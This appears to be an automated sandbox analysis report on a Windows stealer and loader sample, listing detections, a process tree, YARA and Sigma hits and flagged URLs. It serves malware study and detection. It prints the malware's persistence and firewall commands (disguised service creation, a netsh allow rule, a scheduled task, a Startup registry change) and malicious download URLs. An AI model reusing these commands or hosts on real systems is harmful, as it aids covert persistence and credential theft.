Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report tijXCZsbGe.exe

Overview

General Information

Sample Name:tijXCZsbGe.exe
Analysis ID:553073
MD5:888928d26bd03678afd9fed0d92f6fc9
SHA1:37723b453fd3133c01e7a43892b73c6580edd164
SHA256:1cf27ab77a771ff942b1e2947856844fbab4991cf87aca618968445b5c5d706d
Tags:exeRaccoonStealer
Infos:

Most interesting Screenshot:

Detection

Amadey Raccoon RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Sigma detected: Suspicius Add Task From User AppData Temp
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Uses reg.exe to modify the Windows registry
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Sigma detected: Direct Autorun Keys Modification
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evaded block containing many API calls
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • tijXCZsbGe.exe (PID: 6264 cmdline: "C:\Users\user\Desktop\tijXCZsbGe.exe" MD5: 888928D26BD03678AFD9FED0D92F6FC9)
    • tijXCZsbGe.exe (PID: 864 cmdline: "C:\Users\user\Desktop\tijXCZsbGe.exe" MD5: 888928D26BD03678AFD9FED0D92F6FC9)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 9334.exe (PID: 7100 cmdline: C:\Users\user\AppData\Local\Temp\9334.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 6552 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 264 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • DB31.exe (PID: 6560 cmdline: C:\Users\user\AppData\Local\Temp\DB31.exe MD5: 6009BCB680BE6C0F656AA157E56423DC)
        • E748.exe (PID: 5476 cmdline: C:\Users\user\AppData\Local\Temp\E748.exe MD5: 7C64BD730B6C9565F287278834A33618)
          • cmd.exe (PID: 6020 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xzxafeeu\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5984 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 2972 cmdline: C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 6584 cmdline: C:\Windows\System32\sc.exe" description xzxafeeu "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 2848 cmdline: "C:\Windows\System32\sc.exe" start xzxafeeu MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 1004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • reg.exe (PID: 5772 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\ MD5: CEE2A7E57DF2A159A065A34913A055C2)
          • netsh.exe (PID: 6720 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • F65C.exe (PID: 2980 cmdline: C:\Users\user\AppData\Local\Temp\F65C.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • F65C.exe (PID: 5348 cmdline: C:\Users\user\AppData\Local\Temp\F65C.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • 5C89.exe (PID: 5200 cmdline: C:\Users\user\AppData\Local\Temp\5C89.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
        • 6FB4.exe (PID: 5312 cmdline: C:\Users\user\AppData\Local\Temp\6FB4.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
          • mjlooy.exe (PID: 6756 cmdline: "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" MD5: 8B239554FE346656C8EEF9484CE8092F)
            • cmd.exe (PID: 1004 cmdline: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • schtasks.exe (PID: 5836 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
              • conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 8783.exe (PID: 3160 cmdline: C:\Users\user\AppData\Local\Temp\8783.exe MD5: 5800952B83AECEFC3AA06CCB5B29A4C2)
          • AppLaunch.exe (PID: 2860 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
        • 9DFA.exe (PID: 4088 cmdline: C:\Users\user\AppData\Local\Temp\9DFA.exe MD5: 5800952B83AECEFC3AA06CCB5B29A4C2)
        • B0F7.exe (PID: 6956 cmdline: C:\Users\user\AppData\Local\Temp\B0F7.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
  • svchost.exe (PID: 2192 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3848 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • rifsswe (PID: 6952 cmdline: C:\Users\user\AppData\Roaming\rifsswe MD5: 888928D26BD03678AFD9FED0D92F6FC9)
    • rifsswe (PID: 7088 cmdline: C:\Users\user\AppData\Roaming\rifsswe MD5: 888928D26BD03678AFD9FED0D92F6FC9)
  • svchost.exe (PID: 7020 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7128 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 4972 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7100 -ip 7100 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5016 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • gecrjwsv.exe (PID: 2860 cmdline: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d"C:\Users\user\AppData\Local\Temp\E748.exe" MD5: 6DD4312F6A305B72C1A1948F27068190)
    • svchost.exe (PID: 6732 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • mjlooy.exe (PID: 2928 cmdline: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000029.00000002.953737182.0000000000821000.00000004.00000001.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
        00000020.00000002.803587070.0000000000400000.00000040.00020000.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
          0000000A.00000002.767900095.0000000000640000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            00000028.00000003.877844771.0000000003842000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000001.00000002.719913794.0000000000591000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 44 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                34.2.svchost.exe.5d0000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                  32.2.gecrjwsv.exe.400000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                    35.0.F65C.exe.400000.6.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      18.2.F65C.exe.401f910.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        17.2.E748.exe.400000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                          Click to see the 29 entries

                          Sigma Overview

                          System Summary:

                          barindex
                          Sigma detected: Suspect Svchost ActivityShow sources
                          Source: Process startedAuthor: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d"C:\Users\user\AppData\Local\Temp\E748.exe", ParentImage: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe, ParentProcessId: 2860, ProcessCommandLine: svchost.exe, ProcessId: 6732
                          Sigma detected: Copying Sensitive Files with Credential DataShow sources
                          Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\E748.exe, ParentImage: C:\Users\user\AppData\Local\Temp\E748.exe, ParentProcessId: 5476, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\, ProcessId: 5984
                          Sigma detected: Suspicious Svchost ProcessShow sources
                          Source: Process startedAuthor: Florian Roth: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d"C:\Users\user\AppData\Local\Temp\E748.exe", ParentImage: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe, ParentProcessId: 2860, ProcessCommandLine: svchost.exe, ProcessId: 6732
                          Sigma detected: Suspicius Add Task From User AppData TempShow sources
                          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe, ParentProcessId: 6756, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F, ProcessId: 5836
                          Sigma detected: Netsh Port or Application AllowedShow sources
                          Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\E748.exe, ParentImage: C:\Users\user\AppData\Local\Temp\E748.exe, ParentProcessId: 5476, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 6720
                          Sigma detected: Direct Autorun Keys ModificationShow sources
                          Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\, CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 1004, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\, ProcessId: 5772
                          Sigma detected: New Service CreationShow sources
                          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\E748.exe, ParentImage: C:\Users\user\AppData\Local\Temp\E748.exe, ParentProcessId: 5476, ProcessCommandLine: C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 2972

                          Jbx Signature Overview

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection:

                          barindex
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 38.2.5C89.exe.4d40e50.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.5C89.exe.4d40e50.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.3.5C89.exe.4de0000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.5C89.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.3.5C89.exe.4de0000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.5C89.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000026.00000003.868438969.0000000004DE0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.920325973.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.1024945743.0000000004D40000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000003.917559502.0000000004DF0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.931172576.0000000004D50000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.953575570.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 5C89.exe PID: 5200, type: MEMORYSTR
                          Antivirus detection for URL or domainShow sources
                          Source: http://185.163.45.70/capibarAvira URL Cloud: Label: phishing
                          Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                          Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exeAvira URL Cloud: Label: malware
                          Source: http://data-host-coin-8.com/files/8474_1641976243_3082.exeAvira URL Cloud: Label: malware
                          Source: http://185.163.45.70/capibarvgAvira URL Cloud: Label: phishing
                          Source: http://unicupload.top/install5.exeURL Reputation: Label: phishing
                          Source: http://185.163.204.22/capibarAvira URL Cloud: Label: malware
                          Source: https://185.163.204.22/capibarAvira URL Cloud: Label: malware
                          Source: http://data-host-coin-8.com/files/7729_1642101604_1835.exeAvira URL Cloud: Label: malware
                          Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeAvira URL Cloud: Label: malware
                          Source: http://185.215.113.35/d2VxjasuwS/plugins/cred.dllAvira URL Cloud: Label: malware
                          Source: http://185.163.204.22/capibarpAvira URL Cloud: Label: malware
                          Antivirus detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\gecrjwsv.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeAvira: detection malicious, Label: HEUR/AGEN.1211353
                          Multi AV Scanner detection for submitted fileShow sources
                          Source: tijXCZsbGe.exeVirustotal: Detection: 34%Perma Link
                          Source: tijXCZsbGe.exeReversingLabs: Detection: 39%
                          Multi AV Scanner detection for domain / URLShow sources
                          Source: http://185.163.45.70/capibarVirustotal: Detection: 11%Perma Link
                          Source: http://185.215.113.35/d2VxjasuwS/index.phpVirustotal: Detection: 11%Perma Link
                          Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exeVirustotal: Detection: 12%Perma Link
                          Multi AV Scanner detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeMetadefender: Detection: 34%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeReversingLabs: Detection: 76%
                          Source: C:\Users\user\AppData\Local\Temp\6FB4.exeMetadefender: Detection: 29%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\6FB4.exeReversingLabs: Detection: 81%
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeMetadefender: Detection: 45%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeReversingLabs: Detection: 76%
                          Source: C:\Users\user\AppData\Local\Temp\B0F7.exeMetadefender: Detection: 34%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\B0F7.exeReversingLabs: Detection: 76%
                          Machine Learning detection for sampleShow sources
                          Source: tijXCZsbGe.exeJoe Sandbox ML: detected
                          Machine Learning detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Roaming\rifssweJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\gecrjwsv.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\6FB4.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\B0F7.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\C7FA.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\8783.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\9DFA.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeJoe Sandbox ML: detected
                          Source: 16.3.DB31.exe.660000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 32.2.gecrjwsv.exe.580e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 38.3.5C89.exe.4d40000.2.unpackAvira: Label: TR/Crypt.EPACK.Gen2
                          Source: 34.2.svchost.exe.5d0000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 32.3.gecrjwsv.exe.5a0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 17.2.E748.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 17.3.E748.exe.650000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 32.2.gecrjwsv.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 16.2.DB31.exe.640e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 32.2.gecrjwsv.exe.5a0000.2.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 17.2.E748.exe.630e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00407190 CryptUnprotectData,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

                          Compliance:

                          barindex
                          Detected unpacking (overwrites its own PE header)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeUnpacked PE file: 16.2.DB31.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeUnpacked PE file: 17.2.E748.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeUnpacked PE file: 32.2.gecrjwsv.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeUnpacked PE file: 38.2.5C89.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeUnpacked PE file: 38.2.5C89.exe.400000.0.unpack
                          Source: tijXCZsbGe.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49784 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49801 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49867 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49869 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49881 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49888 version: TLS 1.2
                          Source: Binary string: C:\zazadix dori\kol.pdb source: DB31.exe, 00000010.00000000.772191492.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdb source: 5C89.exe, 00000026.00000003.849959984.00000000030D0000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.987438014.0000000003010000.00000040.00000001.sdmp
